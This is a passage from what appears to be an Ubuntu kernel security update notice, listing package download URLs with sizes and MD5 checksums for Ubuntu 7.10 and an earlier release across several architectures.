http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:  1571838 e2e6a5ffe044c14520e27bcb5f5f47d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:   180424 9ba8a77f742b1b835bb1c772ca962e21
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:   310072 427ac0b7e51cb2ad23fe0ec83962cc5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:    39666 f866b608114c567f28f9289a0d85c393
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:    37984 aa56f559318f20f2e417026970a6bb56
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:     8646 b4b5071fe7b4ab2e438d7901370dc94f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:    59422 9d072776affde02fc4c1a90906ed2353
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:    90818 1be13bc72f1ccc91803bba932730c25d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:   322570 a483b9ea45cad7ab5c8029e96ea80d4d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:   882448 7bb2910febf841cb05000dfd1de8a39f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:     9822 b5066195c7efedec27f28e166ee4967f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:   290142 732ddc7d6de7127a9b3163a76531473f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-17-sparc64-di_2.6.20-17.36_sparc.udeb
  Size/MD5:    54806 a249da34b1433114facbfda16afb0584
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-sparc64-smp_2.6.20.6-17.31_sparc.deb
  Size/MD5:   998636 e5e1018d1febb0a25443a1608d84d3d8
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.20/linux-restricted-modules-2.6.20-17-sparc64_2.6.20.6-17.31_sparc.deb
  Size/MD5:   998568 5dc6e3bd57278f3876e0ac6d1e5ac06a

Updated packages for Ubuntu 7.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22_2.6.22-15.16.dsc
  Size/MD5:     2124 215e3f71f504f09cb9d67ba3bce891c9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22_2.6.22-15.16.tar.gz
  Size/MD5:  3074102 dcede517498030950f00193fd7636cba
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-15.54.diff.gz
  Size/MD5:  3546714 bc3375a85185bb7c896f5373d04f927e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-15.54.dsc
  Size/MD5:     2262 6d8aecb432a702d53ad5e15f9fce41d1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22.orig.tar.gz
  Size/MD5: 56913972 c98e1329975a8a7931ae63bafe39b63a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22_2.6.22-15.39.dsc
  Size/MD5:     2224 3fb717a6f4c6ca172730606024026677
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22_2.6.22-15.39.tar.gz
  Size/MD5:  6963922 51c929273ac6d58421cec603e65fdbc5
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22_2.6.22.4-15.11.diff.gz
  Size/MD5:   552663 40de07a2a55ec6e25250ef591fa1a70b
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22_2.6.22.4-15.11.dsc
  Size/MD5:     2735 6b99b949b4bdcac45c5ba49caf55d763
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22_2.6.22.4.orig.tar.gz
  Size/MD5: 143875748 ccbf90c68bf682e9df2371cd85c83c86

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-doc-2.6.22_2.6.22-15.54_all.deb
  Size/MD5:  4615002 41f0e4a86eb60e4f347677842fc1a7b8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15_2.6.22-15.54_all.deb
  Size/MD5:  7777268 5cce85c4b4a889d0cbc9a1b5abb3c9a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-kernel-devel_2.6.22-15.54_all.deb
  Size/MD5:    48284 20aff25c6f59f891366b96484814bf10
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-source-2.6.22_2.6.22-15.54_all.deb
  Size/MD5: 45358212 f4fbc3ed3178453493924895e400b616
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-common_2.6.22.4-15.11_all.deb
  Size/MD5:    23372 1e08b20ca5d505d55d734e1e1aa7c212

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-generic_2.6.22-15.16_amd64.deb
  Size/MD5:  1181490 06a8c108ea3eb048aa7f7ade85b1ead6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-server_2.6.22-15.16_amd64.deb
  Size/MD5:     3758 62f7ea6c0cbb542ed06904426dfc097a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/updates-modules-2.6.22-15-generic-di_2.6.22-15.16_amd64.udeb
  Size/MD5:      646 5aed5ef44cf626f067fb5225ef8fccf1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:    24800 531185f6ecc73aa2e5be4b792cc4498e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:   216562 347e3fa6b1550d55c77537eeb557f89d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:    49168 107ddc3f1c939471379d549fa2b0febf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:    40034 d7b9a5d8878064b9aa69bcaad29267ae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:    51758 fd8ed4458bef221560be980e99dd9578
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:    87876 75cd9e963aa71a3765bb3316f72757b2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:    35848 1328b905ca910427bdb7473f268bce86
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:   652046 8edc4095a4e1af4691431bb8c46169dd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:   205958 069e62303753e4b075d6143d019e1314
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:    55596 409a1ea9cd365c2e54f3bd7dcad681c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:    60512 d8cc2ae93537ec154afd9655aeba4cfd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:   146252 b33b05e3b2f87bbf0fce5e0a969db483
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:   285930 b020b5eec97f02b2b5a7f8cad963a878
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:  1947322 62487759486e99cac46c84eb141dcf48
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-generic_2.6.22-15.54_amd64.deb
  Size/MD5:   593756 0cfa2f7530954f717b9bca97595e7ea2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-rt_2.6.22-15.54_amd64.deb
  Size/MD5:  1165316 0816ef9517f5e049c22437f89add88fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-server_2.6.22-15.54_amd64.deb
  Size/MD5:   593956 b508af1ec08db9b68fe53097acb42809
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-15-xen_2.6.22-15.54_amd64.deb
  Size/MD5:   949302 3c49468b650469542a3fc85c9a85d309
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-15-generic_2.6.22-15.54_amd64.deb
  Size/MD5: 17543644 7c467ec6abac34b98b6fc72a5b0a08e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-15-server_2.6.22-15.54_amd64.deb
  Size/MD5: 17586456 947e9312ac817b9aaf36a0bae43af3a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-15-generic_2.6.22-15.54_amd64.deb
  Size/MD5: 18740292 d8f5abc64c06e0d951f00295db516f7d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-15-server_2.6.22-15.54_amd64.deb
  Size/MD5: 19045588 2c29290b72f5dcf8cde1de91b6c8b061
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-15.54_amd64.deb
  Size/MD5:   653630 06c7f1cab32983620ce58fab3ed12288
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:   252194 6490c4cf504d462e965ad16f9326a7e6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:   150734 52651e2b2ec7a9348bef67b3c8add406
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:   236406 d03ab1e8dab84b9818448c6579286a25
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:  1449288 149bbcbfb2f4801fd74e251c6dd68ebf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:   142738 dbf111770227c3ed685c2a79d028e233
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:   148666 f6b788f8348f92f08c5a81a66e7a02cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:    86010 52eca61e95705ecc9e1db45c37ef0d5e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:    35446 8942a8ccbe1be9e71f07d109875771c0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:    38396 f506ccb2cb0d35c0f36f676cec4ca394
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:    70052 773f942a98207464ca5d62c6f955bc98
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:    21462 acbac49df228ab72c5ea07d12865bea7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:     8658 da2dac3d46f3ea80526ed9a29c83f56c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:    56404 0d818ef611df79adaf83e383bcb93b3d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:    88010 0de65f917fd1f6dc28018a910fe29fcc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:  1101072 474a9588c6c099d13bdd5404860d3c47
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:    45206 069e3168b034cd9756e1726e52f401d1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:    12676 e66b970e6acd7e648a6dd8fa91711913
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:   462914 b54bda2ce3b03da51c7b0a48b9a2635f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-15-generic-di_2.6.22-15.54_amd64.udeb
  Size/MD5:    71790 ac4a611b906456588036bcc639c354cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-generic_2.6.22-15.39_amd64.deb
  Size/MD5:  3013948 86e7a6e87eddd16d2e9ce82e9ec269a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-server_2.6.22-15.39_amd64.deb
  Size/MD5:  3012046 41d80f29a78860b4f323a669a1fb71b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/nic-firmware-2.6.22-15-generic-di_2.6.22-15.39_amd64.udeb
  Size/MD5:  1048448 a5be33841544473a7cc80eb6cba14766
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/scsi-firmware-2.6.22-15-generic-di_2.6.22-15.39_amd64.udeb
  Size/MD5:   322530 6ec01c4069caf838edc3830ea5b92c85
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ubuntu-modules-2.6.22/ubuntu-modules-2.6.22-15-generic-di_2.6.22-15.39_amd64.udeb
  Size/MD5:   477916 813f8a19f99dcefbe272b17561d22f50
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/avm-fritz-kernel-source_3.11+2.6.22.4-15.11_amd64.deb
  Size/MD5:  2134688 59b6823d1adf0dc7ff2dc0155ea21607
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/fglrx-kernel-source_8.37.6+2.6.22.4-15.11_amd64.deb
  Size/MD5:   191952 3b03fae1017d369824d7955ba655445c
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-rt_2.6.22.4-15.11_amd64.deb
  Size/MD5: 13660818 b3e3951e1a061dff40d3a05d997c30f1
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-xen_2.6.22.4-15.11_amd64.deb
  Size/MD5:  9854790 9938d8c957c31d19435a3f8158863f02
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/nvidia-glx-legacy-dev_1.0.7185+2.6.22.4-15.11_amd64.deb
  Size/MD5:   169332 c6f2bf946b8030afe43d6cd74228151f
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/nvidia-glx-legacy_1.0.7185+2.6.22.4-15.11_amd64.deb
  Size/MD5:  6070814 e857a22069a35ed93d2c5efeef1fa10e
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/nvidia-kernel-source_1.0.9639+2.6.22.4-15.11_amd64.deb
  Size/MD5:  1862772 96fbbf557068a82ed152100ef0262672
http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.22/nvidia-legacy-kernel-source_1.0.7185+2.6.22.4-15.11_amd64.deb
  Size/MD5:  1390454 60065b0b590d25df1d6f9a0c0bc1377d
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/avm-fritz-firmware-2.6.22-15_3.11+2.6.22.4-15.11_amd64.deb
  Size/MD5:   479942 325f03b109f752ca8789d0c9e186e68c
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/fglrx-control_8.37.6+2.6.22.4-15.11_amd64.deb
  Size/MD5:    82088 41d91b8db807afe1807fbd68d7d31556
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/linux-restricted-modules-2.6.22-15-generic_2.6.22.4-15.11_amd64.deb
  Size/MD5: 13457086 a7c759a22c8004230c597d2337c56a71
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nic-restricted-firmware-2.6.22-15-generic-di_2.6.22.4-15.11_amd64.udeb
  Size/MD5:      766 ddf18ca1250601123959bdedc2d2c79b
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nic-restricted-modules-2.6.22-15-generic-di_2.6.22.4-15.11_amd64.udeb
  Size/MD5:      734 753130cf45e4d916ce3792326662ed90
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nvidia-glx-dev_1.0.9639+2.6.22.4-15.11_amd64.deb
  Size/MD5:   178324 763f49138f65bcd25344b3165caf624d
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nvidia-glx-new-dev_100.14.19+2.6.22.4-15.11_amd64.deb
  Size/MD5:   158248 da89d68c5bf9bd4a953699b0a7a677c5
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nvidia-glx-new_100.14.19+2.6.22.4-15.11_amd64.deb
  Size/MD5:  8890896 044fcbd4369090fb6ddfef265c68eda0
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nvidia-glx_1.0.9639+2.6.22.4-15.11_amd64.deb
  Size/MD5:  7996392 f71195542bcffbd3c5617cd04976dcff
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/nvidia-new-kernel-source_100.14.19+2.6.22.4-15.11_amd64.deb
  Size/MD5:  2279348 cbea5190dcb7ebae1c6cae41f812d43c
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/xorg-driver-fglrx-dev_7.1.0-8.37.6+2.6.22.4-15.11_amd64.deb
  Size/MD5:    67596 6c459900b9d5f076f8db357dd024b33d
http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.22/xorg-driver-fglrx_7.1.0-8.37.6+2.6.22.4-15.11_amd64.deb
  Size/MD5: 12254418 cfd39f34d91e4a48573ded79c6215427
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-rt_2.6.22-15.16_amd64.deb
  Size/MD5:     3754 81ca2ccde6e44e42d0acb8b6f4f8d766
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-xen_2.6.22-15.16_amd64.deb
  Size/MD5:     3782 76929d77a0fbbb99e401a179efe3d40c
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-15-rt_2.6.22-15.54_amd64.deb
  Size/MD5: 17592292 0cdb657d868402a744dd67acbd9c7b46
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-15-xen_2.6.22-15.54_amd64.deb
  Size/MD5: 17355358 5cf6d90812d22fe685c4930f6ab5b99a
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-rt_2.6.22-15.39_amd64.deb
  Size/MD5:  3017126 58a8de462a320964eb37d4713ef063e9
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-ubuntu-modules-2.6.22/linux-ubuntu-modules-2.6.22-15-xen_2.6.22-15.39_amd64.deb
  Size/MD5:  3013834 3b2735bb3fe07a149a0c6d7216c3e08d

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-386_2.6.22-15.16_i386.deb
  Size/MD5:     3756 38e40f57e2213ec44de12fd1586c9a28
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-generic_2.6.22-15.16_i386.deb
  Size/MD5:  1379014 512338d9fa1b651ecbc39b1db0285688
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/linux-backports-modules-2.6.22-15-server_2.6.22-15.16_i386.deb
  Size/MD5:     3768 4c0ab45a0ba5dc56a9006e0797ac8a7f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/updates-modules-2.6.22-15-386-di_2.6.22-15.16_i386.udeb
  Size/MD5:      644 5f31cf301f6b8971e7e8733e85c212db
http://security.ubuntu.com/ubuntu/pool/main/l/linux-backports-modules-2.6.22/updates-modules-2.6.22-15-generic-di_2.6.22-15.16_i386.udeb
  Size/MD5:      644 df4807c07fdd185f50ef8dc3743bc4bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb
  Size/MD5:    20418 0f9de8a6295d16cae1fe7b9d25f4c822
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb
  Size/MD5:    23228 5e895d82dd9023b629fef23526464f91
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb
  Size/MD5:   211438 5e635a70e6b1d97021164f5a6bd11d51
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb
  Size/MD5:   213080 df89aaa52d9017a795bf22dec05ec035
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/cdrom-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb
  Size/MD5:    89010 2e70caf2aa5cefb7070ec8668212188c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/cdrom-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb
  Size/MD5:    35754 d7642234f8bd7dea30b36dea8816b934
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb
  Size/MD5:    50008 21d399d289ffc1c0a787d6d1814ac7fe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb
  Size/MD5:    50140 127fa8d9247590932c3bec3d2fba5029
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb
  Size/MD5:    37956 3d389edb98991e385f671f0d44178d53
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb
  Size/MD5:    38610 f07c2e59ed2764026399ebc28685a107
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb
  Size/MD5:    44950 3e9f0f01a37259c48855afbfc5043f26
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb
  Size/MD5:    45204 60ed4bebdd8f793b28687067956b6460
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb
  Size/MD5:    85328 a1340f905e08fabee46c8c643fdaa5f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb
  Size/MD5:    85656 ca69911c4bdab605ba471592f9b22d24
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb
  Size/MD5:    32344 0f9de7030cccebbb73316b74ee81d04d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb
  Size/MD5:    32646 201910ec059ef8901a70fc6748648b90
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb
  Size/MD5:   640694 5c2e673d57c1a9aecea86edc15a08664
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb
  Size/MD5:   659482 c805fd12258be8e0f94c43b9dc5017b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb
  Size/MD5:   206054 6b84aacb3a21d7c5ecca022fec9b7758
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb
  Size/MD5:   209784 ba33674cfcea7eabc5d3365a4725472c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb
  Size/MD5:    52652 b81d9b2a4d891f5176ff23e03c931ac4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb
  Size/MD5:    53866 089d7bcd4eecff3ae3cdfa3dae74988e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb
  Size/MD5:    55524 cbddfa0961691f5af1e5078f1fbc6341
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-15-generic-di_2.6.22-15.54_i386.udeb
  Size/MD5:    56914 4975e2e7e8a9cf550c7b763390de6353
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-15-386-di_2.6.22-15.54_i386.udeb
  Size/MD5:   130910 a56c5b5ef04d03fc9d7abe4dd9ad1dd8
